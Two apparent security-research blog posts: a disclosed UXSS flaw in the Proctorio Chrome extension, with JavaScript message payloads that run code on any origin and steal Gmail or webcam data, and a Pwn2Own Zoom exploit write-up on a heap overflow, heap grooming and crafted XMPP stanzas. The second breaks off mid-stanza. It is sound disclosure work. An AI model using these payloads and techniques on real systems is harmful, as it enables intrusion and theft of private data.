For universities this posed a problem: how are you going to prevent students from cheating if they take the test in a location where you have no control nor visibility? In The Netherlands most universities quickly adopted anti-cheating software that students were required to install in order to be able to take a test. This to the dissatisfaction of students, who found this software to be too invasive of their privacy. Students were required to run monitoring software on their personal device that would monitor their behaviour via the webcam and screen recording.

The usage of this software was covered by national media on a regular basis, as students fought to disallow universities to use this kind of software. This led to several court cases were universities had to defend the usage of this software. The judge ended up ruling in favour of the universities.

Proctorio is such monitoring software and it is used by most Dutch universities. For students this comes as a Google Chrome extension. And indeed, the extension has quite an extensive list of permissions. This includes the recording of your screen and permission to read and change all data on the websites that you visit.

All this was reason enough for us to have a closer look to this much debated software. After all, vulnerabilities in this extension could have considerable privacy implications for students with this extension installed. In the end, we found a severe vulnerability that leads to a Universal Cross-Site Scripting vulnerability, which could be triggered by any website. This means that a malicious website visited by the user could steal or modify any data from every website, if the victim had the Proctorio extension installed. The vulnerability has since been fixed by Proctorio. As Chrome extensions are updated automatically, this requires no actions from Proctorio users.


Chrome extensions consist of two parts. A background page with JavaScript is the core of the extension, which has the permissions granted to the extension. It can add scripts to currently open tabs, which are known as content scripts. Content scripts have access to the DOM, but use a separate JavaScript environment. Content scripts do not have the full permissions of the background page, but their ability to communicate with the background page makes them more powerful than the JavaScript on a page itself.

Vulnerability details

The Proctorio extension inspects network traffic of the browser. When requests are observed for paths that match supported test taking websites, it injects some content scripts into the page. It tries to determine if the user is using a Proctorio-enabled test by retrieving details of the test using specific API endpoints used by the supported test websites.

Once a test is started, a toolbar is added with a number of buttons allowing a student to manage Proctorio. This includes a button to open a calculator, which supports some simple mathematical calculations.

Proctorio Calculator

When the user clicks the ‘=’ button, a function is called in the content script to compute the result. The computation is performed by calling the eval() function in JavaScript, in the minified JavaScript this is in the function named ghij. The function eval() is a dangerous, as it can execute arbitrary JavaScript, not just mathematical expressions. The function ghij does not check that the input is actually a mathematical expression.

Because the calculator is added to DOM of the page activating Proctorio, JavaScript on the page can automatically enter an expression for the calculator and then trigger the evaluation. This allows the webpage to execute code inside the content script. From the context of the content script, the page can then send messages to the background page that are handled as messages from the content script. Using a combination of messages, we found we could trigger UXSS.

(In our Zoom exploit, the calculator was opened just to demonstrate our ability to launch arbitrary applications, but in this case we actually exploit the calculator itself!)

Exploitation to UXSS

By using one of a number of specific paths in the URL, adding certain DOM elements and sending specific responses to a small number of API requests Proctorio can be activated by any website without user approval. By pretending to be in demo mode and automatically activating the demo, the page can start a complete Proctorio session. This happens completely automatically, without user interaction. Then, the page can open the calculator and use the exploit to execute code in the content script.

The content script itself does not have the full permissions of the browser extension, but it does have permission to send messages to the background page. The JavaScript on the background page supports a large number of different messages, each identified by a number indicated by the first element of the array which is the message.

The first thing that can be done using that is to download a URL while bypassing the Same Origin Policy. There are a number of different message types that will download a URL and return the result. For example, message number 502:

chrome.runtime.sendMessage([502, '1', '2', ''], alert);

(The # is used here to make sure anything which is appended after it is not sent to the server.)

This downloads the URL in the session of the current user and returns the result to the page. This could be used to, for example, retrieve all of the user’s email messages if they are signed in to their webmail if it uses cookies for authentication. Normally, this is not allowed unless the URL uses the same origin, or the response specifically allows it using Cross-Origin Resource Sharing (CORS).

A CORS bypass is already a serious vulnerability, but it can be extended further. A universal cross-site scripting attack can be performed in the following way.

Some messages trigger the adding of new content scripts to the tab. Sometimes, variables need to be passed to those scripts. Most of the time those variables are escaped correctly, but when using a message with number 25, the argument is not escaped. The minified code for this function is:

if (25 == a[0]) return chrome.tabs.executeScript(, {
    code: c0693(a[1])
}, function() {}), c({}), !0;

which calls:

function c0693(a) {
    return "(" + function(a) {
        var b = document.getElementsByTagName("body");
        if (b.length) b[0].innerHTML = a; else {
            b = document.getElementsByTagName("html")[0];
            var c = document.createElement("body");
            c.innerHTML = a;
    } + ")(" + a + ");";

This function c0693() contains a function which is converted to a string. This inner function not executed by the background page, but by converting it to a string it takes the text of this function, which is then called using the argument a in the content script. Note that the last line in this function does not escape that value. This means that it is possible to include JavaScript, which is then executed in the context of the content script in the same tab that sent the message.

Evaluating JavaScript in the same tab again is not very useful on its own, but it is possible to make the tab switch origins in between sending the message and the execution of the new script. This is because the call to executeScript specifies the tab id, which doesn’t change when navigating to a different page.

Message with number 507 uses a synchronous XMLHttpRequest, which means that the JavaScript of the entire background page will be blocked while waiting for the HTTP response. By sending a request to a URL which is set up to always take 5 seconds to respond, then immediately sending a message with number 25 and then changing the location of the tab, the JavaScript from the 25 message is executed on a new page instead.

For example, the following will allow the origin to execute an alert on the origin:

chrome.runtime.sendMessage([507, '1', '2', '']);

chrome.runtime.sendMessage([25, 'alert(document.domain)']);

document.location = '';

The URL is used here as an example of a URL that takes 5 seconds to respond.

The video below demonstrates the attack:

Finally, the user could notice the fact that Proctorio is enabled based on the color of the Proctorio icon in the browser bar, which turns green once it activates. However, sending a message [32, false] turns this icon grey again, even though Proctorio is still active. The malicious webpage could quickly turn the icon grey again after exploiting the content script, which means the user only has a few milliseconds to notice the attack.

What can we do with UXSS?

An important security mechanism of your browser is called the Same Origin Policy (SOP). Without SOP surfing the web would be very insecure, as websites would then be able to read data from other domains (origins). It is the most important security control the browser has to enforce.

With an Universal XSS vulnerability a malicious webpage can run JavaScript on other pages, regardless of the origin. This makes this a very powerful primitive for an attacker to have in a browser. The video below shows that we can use this primitive to obtain a screenshot from the webcam and to download a GMail inbox, using our exploit from above.

For stealing GMail data we just need to inject some JavaScript that copies the content of the inbox and sends it to a server under our control. For getting a webcam screenshot we rely on the fact that most people will have allowed certain legitimate domains to have webcam access. In particular, users of Proctorio who had to enable their webcam for a test will have given the legitimate test website permission to use the webcam. We use UXSS to open a tab of such a domain and inject some JavaScript that grabs a webcam screenshot. In the example we rely on the fact that the victim has previously granted the domain webcam access. This can be any page, but due to the pandemic we think that would be a pretty safe bet. (The stuffed animal is called Dikkie Dik, from a well known Dutch children’s picture book.)


We contacted Proctorio with our findings on June 18th, 2021. They replied back within hours thanking us for our findings. Within a week (on June 25th) they reported that the vulnerability was fixed and a new version was pushed to the Google Chrome Web Store. We verified that the vulnerability was fixed on August 3rd. Since Google Chrome automatically updates installed extensions, this requires no further action from the end-user. At the time of writing version 1.4.21183.1 is the latest version.

In the fixed version, an iframe is used to load a webpage for the calculator, meaning exploiting this vulnerability is no longer possible.

Installing software on your (personal) device, either for work or for study always adds new risks end-users should be aware of. In general it is always wise to deinstall software as soon as you no longer need it, in order to mitigate this risk. In this situation one could disable the Proctorio plugin, to avoid it being accessible when you are not taking a test.

Zoom RCE from Pwn2Own 2021

23 August 2021 at 00:00

On April 7 2021, Thijs Alkemade and Daan Keuper demonstrated a zero-click remote code execution exploit in the Zoom video client during Pwn2Own 2021. Now that related bugs have been fixed for all users (see ZDI-21-971 and ZSB-22003) we can safely detail the bugs we exploited and how we found them. In this blog post, we wanted to not only explain the bugs and our exploit, but provide a log of our entire process. We hope that detailing our process helps others with similar research in the future. While we had profound experience with exploiting memory corruption vulnerabilities on many platforms, both of us had zero experience with this on Windows. So during this project we had a lot to learn about the Windows internals.

Wow - with just 10 seconds left of their 2nd attempt, Daan Keuper and Thijs Alkemade were able to demonstrate their code execution via Zoom messenger. 0 clicks were used in the demo. They're off to the disclosure room for details. #Pwn2Own

— Zero Day Initiative (@thezdi) April 7, 2021

This is going to be quite a long post. So before we dive into the details, now that the vulnerabilities have been fixed, below you can see a full run of the exploit (now fixed) in action. The post hereafter will explain in detail every step that took place during the exploitation phase and how we came to this solution.


Participating in Pwn2Own was one of the initial goals we had for our new research department, Sector 7. When we made our plans last year, we didn’t expect that it would be as soon as April 2021. In recent years the Vancouver edition in spring has focused on browsers, local privilege escalation and virtual machines. The software in these categories has received a lot of attention to security, including many specific defensive layers. We’d also be competing with many others who may have had a full year to prepare their exploits.

To our surprise, on January 27th Pwn2Own was officially announced with a new category: “Enterprise Communications”, featuring Microsoft Teams and the Zoom Meetings client. These tools have become incredibly important due to the pandemic, so it makes sense for those to be added to Pwn2Own. We realized that either of these would be a much better target for us, because most researchers would have to start from scratch.

Announcing #Pwn2Own Vancouver 2021! Over $1.5 million available across 7 categories. #Tesla returns as a partner, and we team up with #Zoom for the new Enterprise Communications category. Read all the details at #P2O

— Zero Day Initiative (@thezdi) January 26, 2021

We had not yet decided between Zoom and Microsoft Teams. We made a guess for what type of vulnerability we would expect could lead to RCE in those applications: Microsoft Teams is developed using Electron with a few native libraries in C++ (mainly for platform integration). Electron apps are built using HTML+JavaScript with a Chromium runtime included. The most likely path for exploitation would therefore be a cross-site scripting issue, possibly in combination with a sandbox escape. Memory corruption could be possible, but the number of native libraries is small. Zoom is written in C++, meaning the most likely vulnerability class would be memory corruption. Without any good data on which would be more likely, we decided on Zoom, simply because we like doing research on memory corruption more than XSS.

Step 1: What is this “Zoom”?

Both of us had not used Zoom much (if at all). So, our very first step was to go through the application thoroughly, focused on identifying all ways you can send something to another user, as that was the vector we wanted for the attack. That turned out to be quite a list. Most users will mainly know the video chat functionality, but there is also a quite full featured chat client included, with the ability to send images, create group chats, and many more. Within meetings, there’s of course audio and video, but also another way to chat, send files, share the screen, etc. We made a few premium accounts too, to make sure we saw as much as possible of the features.

Step 2: Network interception

The next step was to get visibility in the network communication of the client. We would need to see the contents of the communication in order to be able to send our own malicious traffic. Zoom uses a lot of HTTPS requests (often with JSON or protobufs), but the chat connection itself uses a XMPP connection. Meetings appear to have a number of different options depending on what the network allows, the main one a custom UDP based protocol. Using a combination of proxies, modified DNS records, sslsplit and a new CA certificate installed in Windows, we were able to inspect all traffic, including HTTP and XMPP, in our test environment. We initially focused on HTTP and XMPP, as the meeting protocol seemed like a (custom) binary protocol.

Step 3: Disassembly

The following step was to load the relevant binaries in our favorite disassemblers. Because we knew we wanted a vulnerability exploitable from another user, we started with trying to match the handling of incoming XMPP stanzas (a stanza is an XMPP element you can send to another user) to the code. We found that the XMPP XML stream is initially parsed by XmppDll.dll. This DLL is based on the C++ XMPP library gloox. This meant that reverse-engineering this part was quite easy, even for the custom extensions Zoom added.

However, it became quite clear that we weren’t going to find any good vulnerabilities here. XmppDll.dll only parses incoming XMPP stanzas and copies the XML data to a new C++ object. No real business logic is implemented here, everything is passed to a callback in a different DLL.

In the next DLL’s we hit a bit of a wall. The disassembly of the other DLL’s was almost impossible to get through due to a large number of calls to vtables and other DLL’s. Almost nothing was available to give us some grip on the disassembled code. The main reason for that was that most DLL’s do no logging at all. Logs are of course useful for dynamic analysis, but also for static analysis they can be very useful, as they often reveal function and variable names and give information about what checks are performed. We found that Zoom had generated a log of the installation, but while running it nothing was logged at all.

After some searching, we found the support pages for how to generate a Troubleshooting log for Zoom:

After reporting a problem through the desktop client, the Support team may ask you to install a special troubleshooting package of Zoom to log more information about your issue and help Zoom engineers investigate the issue. After recreating the issue, these files need to be sent to your Zoom support agent via your existing ticket. The troubleshooting version does not allow Zoom support or engineering access to your computer, but rather just gathers more information about your specific issue.

This suggests that logging is compile-time disabled, but special builds with logging do exist. They are only given out by support to debug a specific issue. For bug bounties any form of social engineering is usually banned. While the Pwn2Own rules don’t mention it, we did not want to antagonize Zoom about this. Therefore, we decided to ask for this version. As Zoom was sponsoring Pwn2Own, we thought they might be willing to give us that client if we asked through ZDI, so we did just that. It is not uncommon for companies to offer specific tools for researchers to help in their research, such as test units Tesla can give to interested researchers.

Sadly, Zoom turned this request down - we don’t know why. But before we could fall back to any social engineering, we found something else that was almost as good. It turns out Zoom has a SDK that can be used to integrate the Zoom meeting functionality in other applications. This SDK consists of many of the same libraries as the client itself, but in this case these DLL files do have logging present. It doesn’t have all of them (some UI related DLL’s are missing), but it has enough to get a good overview of the functionality of the core message handling.

The logging also revealed file names and function names, as can be seen in this disassembled example:

iVar2 = logging::GetMinLogLevel();
if (iVar2 < 2) {
               , 0x39, 1);
    uVar3 = log_message(iVar2 + 8, "[NetworkMonitor::~NetworkMonitor()]", " ", uVar1);

Step 4: Hunting for bugs

With this we could start looking for bugs in earnest. Specifically, we were looking for any kind of memory corruption vulnerability. These often occur during parsing of data, but in this case that was not a likely vector for the XMPP connection. A well known library is used for XMPP and we would also need to get our payload through the server, so any invalid XML would not get to the other client. Many operations using strings are using C++ std::string objects, which meant that buffer overflows due to mistakes in length calculations are also not very likely.

About 2 weeks after we started this research, we noticed an interesting thing about the base64 decoding that was happening in a couple of places:

len = Cmm::CStringT<char>::size(param_1);
result = malloc(len << 2);
len = Cmm::CStringT<char>::size(param_1);
buffer = Cmm::CStringT<char>::c_str(param_1);
status = EVP_DecodeBlock(result, buffer, len);

EVP_DecodeBlock is the OpenSSL function that handles base64-decoding. Base64 is an encoding that turns three bytes into four characters, so decoding results in something which is always 3/4 of the size of the input (ignoring any rounding). But instead of allocating something of that size, this code is allocating a buffer which is four times larger than the input buffer (shifting left twice is the same as multiplying by four). Allocating something too big is not an exploitable vulnerability (maybe if you trigger an integer overflow, but that’s not very practical), but what it did show was that when moving data from and to OpenSSL incorrect calculations of buffer sizes might be present. Here, std::string objects will need to be converted to C char* pointers and separate length variables. So we decided to focus on the calling of OpenSSL functions from Zoom’s own code for a while.

Step 5: The Bug

Zoom’s chat functionality supports a setting named “Advanced chat encryption” (only available for paying users). This functionality has been around for a while. By default version 2 is used, but if a contact sends a message using version 1 then it is still handled. This is what we were looking at, which involves a lot of OpenSSL functions.

Version 1 works more or less like this (as far as we could understand from the code):

  1. The sender sends a message encrypted using a symmetric key, with a key identifier indicating which message key was used.
<message from="[email protected]/ZoomChat_pc" to="[email protected]" id="85DC3552-56EE-4307-9F10-483A0CA1C611" type="chat">
  <body>[This is an encrypted message]</body>
  <active xmlns=""/>
      <send>[email protected]</send>
      <ssid>[email protected]</ssid>
    <action type="SendMessage">
    <app v="0"/>
  <zmtask feature="35">
    <nos>You have received an encrypted message.</nos>
  <zmext expire_t="1680466611000" t="1617394611169">
    <from n="John Doe" e="[email protected]" res="ZoomChat_pc"/>
  1. The recipient checks to see if they have the symmetric key with that key identifier. If not, the recipient’s client automatically sends a RequestKey message to the other user, which includes the recipient’s X509 certificate in order to encrypt the message key (<pub_cert>).
<message xmlns="jabber:client" to="[email protected]" id="{684EF27D-65D3-4387-9473-E87279CCA8B1}" type="chat" from="[email protected]/ZoomChat_pc">
  <active xmlns=""/>
    <from n="Jane Doe" res="ZoomChat_pc"/>
      <send>[email protected]</send>
      <recv>[email protected]</recv>
      <ssid>[email protected]</ssid>
    <action type="RequestKey">
    <v2data action="None"/>
    <app v="0"/>
  <zmtask feature="50"/>
  1. The sender responds to the RequestKey message with a ResponseKey message. This contains the sender’s X509 certificate in <pub_cert>, an <encoded> XML element, which contains the message key encrypted using both the sender’s private key and the recipient’s public key, and a signature in <signature>.
<message from="[email protected]/ZoomChat_pc" to="[email protected]" id="4D6D109E-2AF2-4444-A6FD-55E26F6AB3F0" type="chat">
  <active xmlns=""/>
      <send>[email protected]</send>
      <recv>[email protected]</recv>
      <ssid>[email protected]</ssid>
    <action type="ResponseKey">
      <xkey create_time="1617394606">
    <app v="0"/>
  <zmtask feature="50"/>
  <zmext t="1617394613961">
    <from n="John Doe" e="[email protected]" res="ZoomChat_pc"/>

The way the key is encrypted has two options, depending on the type of key used by the recipient’s certificate. If it uses a RSA key, then the sender encrypts the message key using the public key of the recipient and signs it using their own private RSA key.

The default, however, is not to use RSA but to use an elliptic curve key using the curve P-521. Algorithms for encryption using elliptic curve keys do not exist (as far as we know). So instead of encrypting directly, elliptic curve Diffie-Helman is used using both users’ keys to obtain a shared secret. The shared secret is split into a key and IV to encrypt the message key data with AES. This is a common approach for encrypting data when using elliptic curve cryptography.

When handling a ResponseKey message, a std::string of a fixed size of 1024 bytes was allocated for the decrypted result. When decrypting using RSA, it was properly validated that the decryption result would fit in that buffer. When decrypting using AES, however, that check was missing. This meant that by sending a ResponseKey message with an AES-encrypted <encoded> element of more than 1024 bytes, it was possible to overflow a heap buffer.

The following snippet shows the function where the overflow happens. This is the SDK version, so with the logging available. Here, param_1[0] is the input buffer, param_1[1] is the input buffer’s length, param_1[2] is the output buffer and param_1[3] the output buffer length. This is a large snippet, but the important part of this function is that param_1[3] is only written to with the resulting length, it is not read first. The actual allocation of the buffer happens in a function a few steps earlier.

undefined4 __fastcall AESDecode(undefined4 *param_1, undefined4 *param_2) {
  char cVar1;
  int iVar2;
  undefined4 uVar3;
  int iVar4;
  LogMessage *this;
  int extraout_EDX;
  int iVar5;
  LogMessage local_180 [176];
  LogMessage local_d0 [176];
  int local_20;
  undefined4 *local_1c;
  int local_18;
  int local_14;
  undefined4 local_8;
  undefined4 uStack4;
  uStack4 = 0x170;
  local_8 = 0x101ba696;
  iVar5 = 0;
  local_14 = 0;
  local_1c = param_2;
  cVar1 = FUN_101ba34a();

  if (cVar1 == '\0') {
    return 1;

  if ((*(uint *)(extraout_EDX + 4) < 0x20) || (*(uint *)(extraout_EDX + 0xc) < 0x10)) {
    iVar5 = logging::GetMinLogLevel();
    if (iVar5 < 2) {
                (local_d0, "c:\\ZoomCode\\client_sdk_2019_kof\\Common\\include\\zoom_crypto_util.h",
                 0x1d6, 1);
      local_8 = 0;
      local_14 = 1;
      uVar3 = log_message(iVar5 + 8, "[AESDecode] Failed. Key len or IV len is incorrect.", " ");

      return 1;

    return 1;

  local_14 = param_1[2];
  local_18 = 0;
  iVar2 = EVP_CIPHER_CTX_new();

  if (iVar2 == 0) {
    return 0xc;

  local_20 = iVar2;
  uVar3 = EVP_aes_256_cbc(0, *local_1c, local_1c[2], 0);
  iVar4 = EVP_CipherInit_ex(iVar2, uVar3);

  if (iVar4 < 1) {
    iVar2 = logging::GetMinLogLevel();

    if (iVar2 < 2) {
                 0x1e8, 1);
      iVar5 = 2;
      local_8 = 1;
      local_14 = 2;
      uVar3 = log_message(iVar2 + 8, "[AESDecode] EVP_CipherInit_ex Failed.", " ");
    if (iVar5 == 0) goto LAB_101ba852;
    this = local_d0;
  } else {
    iVar4 = EVP_CipherUpdate(iVar2, local_14, &local_18, *param_1, param_1[1]);

    if (iVar4 < 1) {
      iVar2 = logging::GetMinLogLevel();

      if (iVar2 < 2) {
                  0x1f0, 1);
        iVar5 = 4;
        local_8 = 2;
        local_14 = 4;
        uVar3 = log_message(iVar2 + 8, "[AESDecode] EVP_CipherUpdate Failed.", " ");
      goto LAB_101ba758;

    param_1[3] = local_18;
    iVar4 = EVP_CipherFinal_ex(iVar2, local_14 + local_18, &local_18);

    if (0 < iVar4) {
      param_1[3] = param_1[3] + local_18;
      return 0;

    iVar2 = logging::GetMinLogLevel();
    if (iVar2 < 2) {
                 0x1fb, 1);
      iVar5 = 8;
      local_8 = 3;
      local_14 = 8;
      uVar3 = log_message(iVar2 + 8, "[AESDecode] EVP_CipherFinal_ex Failed.", " ");

    if (iVar5 == 0) goto LAB_101ba852;
    this = local_180;
  return 0xc;

Side note: we don’t know the format of what the <encoded> element would normally contain after decryption, but from our understanding of the protocol we assume it contains a key. It was easy to initiate the old version of the protocol against a new client. But to have a legitimate client initiate requires an old version of the client, which appears to be malfunctioning (it can no longer log in).

We were about 2 weeks into our research and we had found a buffer overflow we could trigger remotely without user interaction by sending a few chat messages to a user who had previously accepted external contact request or is currently in the same multi-user chat. This was looking promising.

Step 6: Path to exploitation

To build an exploit around it, it is good to first mention some pros and cons of this buffer overflow:

  • Pro: The size is not directly bounded (implicitly by the maximum size of an XMPP packet, but in practice this is way more than needed).
  • Pro: The contents are the result of decrypting the buffer, so this can be arbitrary binary data, not limited to printable or non-zero characters.
  • Pro: It triggers automatically without user interaction (as long as the attacker and victim are contacts).
  • Con: The size must be a multiple of the AES block size, 16 bytes. There can be padding at the end, but even when padding is present it will still overwrite the data up to a full block before removing the padding.
  • Con: The heap allocation is of a fixed (and quite large) size: 1040 bytes. (The backing buffer of a std::string on Windows has up to 16 extra bytes for some reason.)
  • Con: The buffer is allocated and then while handling the same packet used for the overflow. We can not place the buffer first, allocate something else and then overflow.

We did not yet have a full plan for how to exploit this, but we expected that we would most likely need to overwrite a function pointer or vtable in an object. We already knew OpenSSL was used, and it uses function pointers within structs extensively. We could even create a few already during the later handling of ResponseKey messages. We investigated this, but it quickly turned out to be impossible due to the heap allocator in use.

Step 7: Understanding the Windows heap allocator

To implement our exploit, we needed to fully understand how the heap allocator in Windows places allocations. Windows 10 includes two different heap allocators: the NT heap and the Segment Heap. The Segment Heap is new in Windows 10 and only used for specific applications, which don’t include Zoom, so the NT Heap was what is used. The NT Heap has two different allocators (for allocations less than about 16 kB): the front-end allocator (known as the Low-Fragment Heap or LFH) and the back-end allocator.

Before we go into detail for how those two allocators work, we’ll introduce some definitions:

  • Block: a memory area which can be returned by the allocator, either in use or not.
  • Bucket: a group of blocks handled by the LFH.
  • Page: a memory area assigned by the OS to a process.

By default, the back-end allocator handles all allocations. The best way to imagine the back-end allocator is as a sorted list of all free blocks (the freelist). Whenever an allocation request is received for a specific size, the list is traversed until a block is found of at least the requested size. This block is removed from the list and returned. If the block was bigger than the requested size, then it is split and the remainder is inserted in the list again. If no suitable blocks are present, the heap is extended by requesting a new page from the OS, inserting it as a new block at the appropriate location in the list. When an allocation is freed, the allocator first checks if the blocks before and after it are also free. If one or both of them are then those are merged together. The block is inserted into the list again at the location matching its size.

The following video shows how the allocator searches for a block of a specific size (orange), returns it and places the remainder back into the list (green).

The back-end allocator is fully deterministic: if you know the state of the freelist at a certain time and the sequence of allocations and frees that follow, then you can determine the new state of the list. There are some other useful properties too, such as that allocations of a specific size are last-in-first-out: if you allocate a block, free it and immediately allocate the same size, then you will always receive the same address.

The front-end allocator, or LFH, is used for allocations for sizes that are used often to reduce the amount of fragmentation. If more than 17 blocks of a specific size range are allocated and still in use, then the LFH will start handling that specific size from then on. LFH allocations are grouped in buckets each handling a range of allocation sizes. When a request for a specific size is received, the LFH checks the bucket most recently used for an allocation of that size if it still has room. If it does not, it checks if there are any other buckets for that size range with available room. If there are none, a new bucket is created.

No matter if the LFH or back-end allocator is used, each heap allocation (of less than 16 kB) has a header of eight bytes. The first four bytes are encoded, the next four are not. The encoding uses a XOR with a random key, which is used as a security measure against buffer overflows corrupting heap metadata.

For exploiting a heap overflow there are a number of things to consider. The back-end allocator can create adjacent allocations of arbitrary sizes. On the LFH, only objects in the same range are combined in a bucket, so to overwrite a block from a different range you would have to make sure two buckets are placed adjacent. In addition, which free slot from a bucket is used is randomized.

For these reasons we focused initially on the back-end allocator. We quickly realized we couldn’t use any of the OpenSSL objects we found previously: when we launch Zoom in a clean state (no existing chat history), all sizes up to around 700 bytes (and many common sizes above it too) would already be handled by the LFH. It is impossible to switch a specific size back from the LFH to the back-end allocator. Therefore, the OpenSSL objects we identified initially would be impossible to allocate after our overflowing block, as they were all less than 700 bytes so guaranteed to be placed in a LFH bucket.

This meant we had to search more thoroughly for objects of larger sizes in which we might be able to overwrite a function pointer or vtable. We found that one of the other DLL’s, zWebService.dll, includes a copy of libcurl, which gave us some extra source code to analyze. Analyzing source code was much more efficient than having to obtain information about a C++ object’s layout from a decompiler. This did give us some interesting objects to overflow that would not automatically be on the LFH.

Step 8: Heap grooming

In order to place our allocations, we would need to do some extensive heap grooming. We assumed we needed to follow the following procedure:

  1. Allocate a temporary object of 1040 bytes.
  2. Allocate the object we want to overwrite after it.
  3. Free the object of 1040 bytes.
  4. Perform the overflow, hopefully at the same address as the 1040 byte object.

In order to do this, we had to be able to make an allocation of 1040 bytes which we could free at a precise later time. But even more importantly, for this to work we would also need to fill up many holes in the freelist so our two objects would end up adjacent. If we want to allocate the objects directly adjacent, then in the first step there needs to be a free block of size 1040 + x, with x the size of the other object. But this means that there must not be any other allocations of size between 1040 and 1040 + x, otherwise that block would be used instead. This means there is a pretty large range of sizes for which there must not be any free blocks available.

To make arbitrary sized allocations, we stayed close to what we already knew. As we mentioned, if you send an encrypted message with a key identifier the other user does not yet have, then it will request that key. We noticed that this key identifier remained in a std::string in memory, likely because it was waiting for a response. It could be an arbitrary large size, so we had a way to make an allocation. It is also possible to revoke chat messages in Zoom, which would also free the pending key request. This gave us a primitive for allocating and freeing a specific size block, but it was quite crude: it would always allocate 2 copies of that string (for some reason), and in order to handle a new incoming message it would make quite a few temporary copies.

We spent a lot of time making allocations by sending messages and monitoring the state of the freelist. For this, we wrote some Frida scripts for tracking allocations, printing the freelist and checking the LFH status. These things can all be done by WinDBG, but we found it way too slow to be of use. There was one nice trick we could use: if specific allocations could get in the way of our heap grooming, then we could trigger the LFH for that size to make sure it would no longer affect the freelist by making the client perform at least 17 allocations of that size.

We spent a lot of time on this, but we ran into a problem. Sometimes, randomly, our allocation of 1040 bytes would already be placed on the LFH, even if we launched the application in a clean state. At first, we accepted this risk: a chance of around 25% to fail is still quite acceptable for the 3 attempts in Pwn2Own. But the more concrete our grooming became, the more additional objects and sizes we needed to use, such as for the objects from libcurl we might want to overwrite. With more sizes, it would get more and more likely that at least of one of them would be handled by the LFH already, completely breaking our exploit. We weren’t very keen on participating with a exploit that had already failed 75% of the time by the time the application had finished launching. We had spent a few weeks on trying to gain control over this, but eventually decided to try something else.

Step 9: To the LFH

We decided to investigate how easy it would be to perform our exploit if we forced the allocation we could overflow to the LFH, using the same method of forcing a size to the LFH first. This meant we had to search more thoroughly for objects of appropriate sizes. The allocation of 1040 bytes is placed in a bucket with all LFH allocations of 1025 bytes to 1088 bytes.

Before we go further, lets look at what defensive measures we had to deal with:

  • ASLR (Address Space Layout Randomization). This means that DLL’s are loaded in random locations and the location of the heap and stack are also randomized. However, because Zoom was a 32-bit application, there is not a very large range of possible addresses for DLL’s and for the heap.
  • DEP (Data Execution Prevention). This meant that there were no memory pages present that were both writable and executable.
  • CFG (Control Flow Guard). This is a relatively new technique that is used to check that function pointers and other dynamic addresses point to a valid start location of a function.

We noticed that ASLR and DEP were used correctly by Zoom, but the use of CFG had a weakness: the 2 OpenSSL DLL’s did not have CFG enabled due to an incompatibility in OpenSSL, which was very helpful for us.

CFG works by inserting a check (guard_check_icall) before all dynamic function calls which looks up the address that is about to be called in a list of valid function start addresses. If it is valid, the call is allowed. If not, an exception is raised.

Not enabling CFG for a dll means two things:

  • Any dynamic function call by this library does not check if the address is a function start location. In other words, guard_check_icall is not inserted.
  • Any dynamic function call from another library which does use CFG which calls an address in these dlls is always allowed. The valid start location list is not present for these dlls, which means that it allows all addresses in the range of that dll.

Based on this, we formed the following plan:

  1. Leak an address from one of the two OpenSSL DLL’s to deal with ASLR.
  2. Overflow a vtable or function pointer to point to a location in the DLL we have located.
  3. Use a ROP chain to gain arbitrary code execution.

To perform our buffer overflow on the LFH, we needed a way to deal with the randomization. While not perfect, one way we avoided a lot of crashes was to create a lot of new allocations in the size range and then freeing all but the last one. As we mentioned, the LFH returns a random free slot from the current bucket. If the current bucket is full, it looks if there are other not yet full buckets of the same size range. If there are none, the heap is extended and a new bucket is created.

By allocating many new blocks, we guaranteed that all buckets for this size range were full and we got a new bucket. Freeing a number of these allocations, but keeping the last block meant we had a lot of room in this bucket. As long as we didn’t allocate more blocks than would fit, all allocations of our size range would come from here. This was very helpful for reducing the chance of overwriting other objects that happen to fall in the same size range.

The following video shows the “dangerous” objects we don’t want to overwrite in orange, and the safe objects we created in green:

As long as Bucket 3 didn’t fill up completely, all allocations for the targeted size range would happen in that bucket, allowing us to avoid overwriting the orange objects. So long as no new “orange” objects were created, we could freely try again and again. The randomization would actually help us ensure that we would eventually obtain the object layout we wanted.

Step 10: Info leak

Turning a buffer overflow into an information leak is quite a challenge, as it depends heavily on the functionality which is available in the application. Common ways would be to allocate something which has a length field, overflow over the length field and then read the field. This did not work for us: we did not find any available functionality in Zoom to send something with an allocation of 1025-1088 with a length field and with a way to request it again. It is possible that it does exist, but analyzing the object layout of the C++ objects was a slow process.

We took a good look at the parts we had code for, and we found a method, although it was tricky.

When libcurl is used to request a URL it will parse and encode the URL and copy the relevant fields into an internal structure. The path and query components of the URL are stored in different, heap allocated blocks with a zero-terminator. Any required URL encoding will already have taken place, so when the request is sent the entire string is copied to the socket until it gets to the first null-byte.

We had found a way to initiate HTTPS requests to a server we control. The method was by sending a weird combination of two stanzas Zoom would normally use, one for sending an invitation to add a user and one notifying the user that a new bot was added to their account. A string from the stanza is then appended to a domain to download an image. However, the string of the prepended domain does not end with a /, so it is possible to extend it to end up at a different domain.

A stanza for requesting another user to be added to your contact list:

<presence xmlns="jabber:client" type="subscribe" email="[email of other user]" from="[email protected]/ZoomChat_pc">
  <status>{"e":"se[email protected]","screenname":"John Doe","t":1617178959313}</status>

The stanza informing a user that a new bot (in this case, SurveyMonkey) was added to their account:

<presence from="[email protected]/ZoomChat_pc" to="[email protected]/ZoomChat_pc" type="probe">
  <zoom xmlns="zm:x:group" group="Apps##61##addon.SX4KFcQMRN2XGQ193ucHPw" action="add_member" option="0" diff="0:1">
      <member fname="SurveyMonkey" lname="" jid="[email protected]" type="1" cmd="/sm" pic_url=" dw/nhYXYiTzSYWf4mM3ZO4_dw/app/UF-vuzIGQuu3WviGzDM6Eg/iGpmOSiuQr6qEYgWh15UKA.png" pic_relative_url="//CSKvJMq_RlSOESfMvUk-dw/nhYXYiTzSYWf4mM3ZO4_dw/app/UF- vuzIGQuu3WviGzDM6Eg/iGpmOSiuQr6qEYgWh15UKA.png" introduction="Manage SurveyMonkey surveys from your Zoom chat channel." signature="" extension="eyJub3RTaG93IjowLCJjbWRNb2RpZnlUaW1lIjoxNTc4NTg4NjA4NDE5fQ=="/>

While a client only expects this stanza from the server, it is possible to send it from a different user account. It is then handled if the sender is not yet in the user’s contact list. So combining these two things, we ended up with the following:

<presence from="[email protected]/ZoomChat_pc" to="[email protected]/ZoomChat_pc">
  <zoom xmlns="zm:x:group" group="Apps##61##addon.SX4KFcQMRN2XGQ193ucHPw" action="add_member" option="0" diff="0:0">
